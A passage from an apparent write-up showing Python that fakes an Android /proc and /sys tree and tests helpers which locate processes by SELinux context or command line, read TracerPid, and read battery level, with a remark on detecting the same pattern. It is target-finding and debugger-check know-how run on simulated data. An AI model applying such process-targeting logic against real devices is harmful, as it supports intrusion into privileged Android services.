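        _write(os.path.join(d, "attr", "current"), ctx + "\x00")
        _write(os.path.join(d, "cmdline"), argv0 + "\x00")
        _write(os.path.join(d, "status"),
               f"Name:\t{argv0}\nPid:\t{pid}\nPPid:\t{ppid}\nTracerPid:\t{tracer}\n")
    bat = os.path.join(root, "sys", "class", "power_supply", "battery")
    os.makedirs(bat)
    _write(os.path.join(bat, "capacity"), "83\n")
    return root


if __name__ == "__main__":
    root = build_fake_root()
    proc, sysfs = os.path.join(root, "proc"), os.path.join(root, "sys")
    print("system_app started by init:", find_pid_by_context(proc, "u:r:system_app:s0"))
    print("zygote64 pid:", find_pid_by_cmdline(proc, "zygote64"))
    print("pid 813 traced:", tracer_pid(proc, 813), telemetry_suffix(proc, 813))
    print("battery:", battery_percent(sysfs))
```

The PPID 1 condition is what makes the context search pick the init-spawned service instance (812) rather than its child (813) even though both carry the same label; it is also why a defender-side hunt for the same pattern should record the parent, not just the label.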